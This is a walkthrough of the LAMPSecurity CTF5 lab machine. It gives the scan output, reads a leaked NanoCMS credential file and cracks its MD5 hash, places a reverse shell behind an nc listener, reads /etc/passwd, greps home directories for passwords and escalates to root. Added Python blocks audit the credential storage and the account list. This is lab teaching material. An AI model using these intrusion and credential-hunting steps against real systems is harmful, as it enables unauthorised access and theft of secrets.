LAMPSecurity CTF5 walkthrough
Disclaimer
Bilibili uploader 泷羽sec
These notes exist only to help fellow practitioners learn. The sites below are involved purely as learning material; anything else has nothing to do with me. Do not cross the legal red line, or bear the consequences yourself.
✍🏻 About the author: devoted to the cybersecurity field; currently a learner, honoured to be a sharer, with the ultimate goal of becoming a pioneer. Interesting, and very meaningful.
🤵♂️ Personal homepage: @One_Blanks
Comments 💬, likes 👍🏻, bookmarks 📂 and follows are welcome
- WeChat official account: 泷羽Sec-Blanks
This series takes you through the most realistic penetration environment it can. The article will not simply hand you the answer; it walks you through information gathering and vulnerability exploitation in full, stepping one by one into the pitfalls I stepped into myself. Real engagements are often more hopeless than this, and skill only comes with practice.
Host discovery and information gathering
nmap -sn 192.168.25.0/24
export ip=192.168.25.140
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
37177/tcp open unknown
MAC Address: 00:0C:29:F7:EA:95 (VMware)
nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,37177 $ip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
25/tcp open smtp Sendmail 8.14.1/8.14.1
80/tcp open http Apache httpd 2.2.6 ((Fedora))
110/tcp open pop3 UW Imap pop3d 2006k.101
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp open imap UW imapd 2006k.396
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
3306/tcp open mysql MySQL 5.0.45
37177/tcp open status 1 (RPC #100024)
nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,37177 $ip
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_ http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-enum:
| /info.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8
| /squirrelmail/images/sm_logo.png: SquirrelMail
| /icons/: Potentially interesting folder w/ directory listing
|_ /inc/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.25.140
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.25.140:80/events/
| Form id: user-login-form
| Form action: /events/?q=node&destination=node
|
| Path: http://192.168.25.140:80/?page=contact
| Form id:
| Form action: ?page=contact
|
| Path: http://192.168.25.140:80/events/?q=node/2
| Form id: user-login-form
| Form action: /events/?q=node/2&destination=node%2F2
|
| Path: http://192.168.25.140:80/events/?q=node&destination=node
| Form id: user-login-form
| Form action: /events/?q=node&destination=node%3Famp%253Bdestination%3Dnode
|
| Path: http://192.168.25.140:80/events/?q=tracker
| Form id: user-login-form
| Form action: /events/?q=tracker&destination=tracker
|
| Path: http://192.168.25.140:80/events/?q=blog
| Form id: user-login-form
| Form action: /events/?q=blog&destination=blog
|
| Path: http://192.168.25.140:80/events/?q=event
| Form id: event-taxonomy-filter-form
| Form action: /events/?q=event
|
| Path: http://192.168.25.140:80/events/?q=event
| Form id: event-type-filter-form
| Form action: /events/?q=event
|
| Path: http://192.168.25.140:80/events/?q=event
| Form id: user-login-form
| Form action: /events/?q=event&destination=event
|
| Path: http://192.168.25.140:80/events/?q=node/1
| Form id: user-login-form
| Form action: /events/?q=node/1&destination=node%2F1
|
| Path: http://192.168.25.140:80/events/?q=comment/reply/2
| Form id: comment-form
| Form action: /events/?q=comment/reply/2
|
| Path: http://192.168.25.140:80/events/?q=comment/reply/2
| Form id: user-login-form
| Form action: /events/?q=comment/reply/2&destination=comment%2Freply%2F2
|
| Path: http://192.168.25.140:80/events/?q=blog/1
| Form id: user-login-form
| Form action: /events/?q=blog/1&destination=blog%2F1
|
| Path: http://192.168.25.140:80/events/?q=user/register
| Form id: user-register
|_ Form action: /events/?q=user/register
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
37177/tcp open unknown
MAC Address: 00:0C:29:F7:EA:95 (VMware)
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Port 80 web service penetration
Directory brute-forcing
gobuster dir -u http://192.168.25.140/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/events (Status: 301) [Size: 316] [--> http://192.168.25.140/events/]
/mail (Status: 301) [Size: 314] [--> http://192.168.25.140/mail/]
/list (Status: 301) [Size: 314] [--> http://192.168.25.140/list/]
/inc (Status: 301) [Size: 313] [--> http://192.168.25.140/inc/]
/phpmyadmin (Status: 301) [Size: 320] [--> http://192.168.25.140/phpmyadmin/]
/squirrelmail (Status: 301) [Size: 322] [--> http://192.168.25.140/squirrelmail/]
Going by the scan's hint, the page parameter points to a file inclusion vulnerability:
http://192.168.25.140/?page=about%27%20OR%20sqlspider
http://192.168.25.140/events/?q=event%2Fical%27%20OR%20sqlspider
A CMS framework is found:
http://192.168.25.140/~andy/
NanoCMS
Looking for a public exploit
searchsploit NanoCMS
There is a remote command execution vulnerability, but it requires authorisation that we do not have, so we pass on it for now.
Let's search in the browser and see whether there is anything else.
https://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.100141
Here we find an information disclosure vulnerability:
/data/pagesdata.txt sits inside the data directory
http://192.168.25.140/~andy/data/pagesdata.txt
;s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd"
hash-identifier 9d2f75377ac0ab991d40c91fd27e52fd
The hash format is identified as MD5.
MD5 lookup websites:
pmd5.com
ttmd5.com
www.somd5.com
xmd5.com
https://hashes.com/zh/decrypt/hash (bookmark this one)
The password resolves to shannon
Logging in to the admin backend
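The data file exposed above stores the admin credentials as PHP serialize() output with a bare, unsalted MD5 digest as the password field. The following Python is an added example (not NanoCMS code and not part of the original writeup) showing how a defender would audit such a file: it parses the length-prefixed string tokens the way unserialize() does, flags the 32-hex-digit password field as unsalted MD5, and shows the salted, iterated storage the application should have used. The sample fragment is the walkthrough's own line; the parser's ASCII assumption and the PBKDF2 parameters are choices made here.

```python
import hashlib
import hmac
import os
import re

# Constructed sample: the credential fragment the walkthrough reads out of the
# world-readable NanoCMS data/pagesdata.txt (PHP serialize() output).
SAMPLE_FRAGMENT = (
    ';s:8:"username";s:5:"admin";'
    's:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd"'
)

# Start of one PHP serialized string token: s:<length>:"
_TOKEN_START = re.compile(r's:(\d+):"')


def parse_php_strings(fragment: str) -> dict:
    """Read consecutive s:N:"..." tokens as alternating keys and values.

    The declared length drives the parse, as PHP's unserialize() does, so a
    value containing quotes or semicolons is read correctly and a fragment
    whose length fields disagree with its content is rejected. Assumes ASCII
    values, so character and byte lengths agree.
    """
    tokens, pos = [], 0
    while True:
        m = _TOKEN_START.search(fragment, pos)
        if not m:
            break
        length = int(m.group(1))
        start = m.end()
        value = fragment[start:start + length]
        if fragment[start + length:start + length + 1] != '"':
            raise ValueError(f"length field {length} does not match content at offset {m.start()}")
        tokens.append(value)
        pos = start + length + 1
        if fragment[pos:pos + 1] == ";":   # trailing separator is optional at end of fragment
            pos += 1
    if len(tokens) % 2:
        raise ValueError("odd number of string tokens: key without a value")
    return dict(zip(tokens[0::2], tokens[1::2]))


def looks_like_unsalted_md5(stored: str) -> bool:
    """A bare 32-hex-digit field has the shape of an unsalted MD5 digest."""
    return re.fullmatch(r"[0-9a-f]{32}", stored) is not None


def audit_credentials(fragment: str):
    """Return the parsed fields plus hardening findings for the password field."""
    fields = parse_php_strings(fragment)
    findings = []
    if looks_like_unsalted_md5(fields.get("password", "")):
        findings.append("password stored as unsalted MD5: cheap to brute-force and "
                        "identical passwords share one digest")
    return fields, findings


# Hardened storage: salted, iterated PBKDF2-HMAC-SHA256 in a self-describing
# string, verified with a constant-time comparison.
def hash_password(password: str, iterations: int = 200_000, salt: bytes = None) -> str:
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    alg, iterations, salt_hex, dk_hex = stored.split("$")
    if alg != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    fields, findings = audit_credentials(SAMPLE_FRAGMENT)
    print(fields)
    print(findings)
    print(hash_password("example-only"))
```

The two findings a reviewer would raise against this file are independent: the data file is reachable over HTTP at all (it belongs outside the web root or behind a deny rule), and even if it were not, a fast unsalted digest lets anyone who obtains it recover the password with a wordlist, exactly as the walkthrough goes on to do.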
http://192.168.25.140/~andy/data/nanoadmin.php
We are in.
Embed a PHP reverse-shell payload in a page on the site.
After saving, start a listener in Kali:
nc -nvlp 4444
Then go back and click Contact.
Obtaining an initial foothold
The connection comes back.
Privilege escalation
whoami
id
ip addr
ls
uname -a
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
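The listing above is worth reading as a defender as well as an attacker: beyond the five human accounts, it shows service accounts (mysql, cyrus) with a real login shell, and an account (news) whose empty shell field means login falls back to /bin/sh rather than refusing. The following Python is an added example (not from the original writeup) that parses /etc/passwd lines and reports those hardening findings; the sample lines are taken unchanged from the listing above, and UID_MIN=500 is an assumption about this Fedora-era box's login.defs.

```python
from dataclasses import dataclass

# Constructed sample: a subset of the /etc/passwd lines shown in the walkthrough.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
news:x:9:13:news:/etc/news:
apache:x:48:48:Apache:/var/www:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
"""

# Shells that do not give an interactive session.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
                  "/sbin/halt", "/sbin/shutdown", "/bin/sync"}
# Assumption: first regular-user UID (UID_MIN in /etc/login.defs) on this box is 500.
UID_MIN = 500
# Conventional unprivileged placeholder UIDs, not people.
NOBODY_UIDS = {99, 65534}


@dataclass
class Account:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines into Account records, rejecting malformed lines."""
    accounts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, gecos, home, shell = fields
        # An empty shell field is not "no login": login(1) falls back to /bin/sh.
        accounts.append(Account(name, int(uid), int(gid), gecos, home, shell or "/bin/sh"))
    return accounts


def is_interactive(acct: Account) -> bool:
    return acct.shell not in NOLOGIN_SHELLS


def audit_passwd(accounts: list, uid_min: int = UID_MIN) -> list:
    """Return (account name, finding) pairs a hardening review would raise."""
    findings = []
    for a in accounts:
        if a.uid == 0 and a.name != "root":
            findings.append((a.name, "additional UID 0 account"))
        if is_interactive(a) and 0 < a.uid < uid_min:
            findings.append((a.name, f"service account with login shell {a.shell}"))
        if is_interactive(a) and a.uid in NOBODY_UIDS:
            findings.append((a.name, f"nobody-style account with login shell {a.shell}"))
    return findings


def human_accounts(accounts: list, uid_min: int = UID_MIN) -> list:
    """Names of regular interactive users: the accounts worth auditing for weak secrets."""
    return [a.name for a in accounts
            if a.uid >= uid_min and a.uid not in NOBODY_UIDS and is_interactive(a)]


if __name__ == "__main__":
    accts = parse_passwd(SAMPLE_PASSWD)
    for name, finding in audit_passwd(accts):
        print(f"{name}: {finding}")
    print("human accounts:", human_accounts(accts))
```

Run against the full listing it separates the five people (patrick, jennifer, andy, loren, amy) from the noise, which is exactly the set of home directories the next step searches; the flagged service shells are the kind of thing a post-compromise hardening pass sets to /sbin/nologin.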
Search the users' traces for leaked credentials
grep -R -i pass /home/* 2>/dev/null
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
/home/patrick/.tomboy.log:12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
Root password: 50$cent
The shell complains that an interactive TTY is required, so spawn one:
python -c 'import pty; pty.spawn("/bin/bash")'
Run that, then:
su -
This switches to root: with no user name after the -, su defaults to root.
Note the difference from sudo su: that asks for the current user's own password, because sudo decides, from the current user's privileges, whether they may run the following command (here su). If the current user is not authorised in the sudoers file to run su through sudo, then sudo su fails even when the current user's password is entered correctly.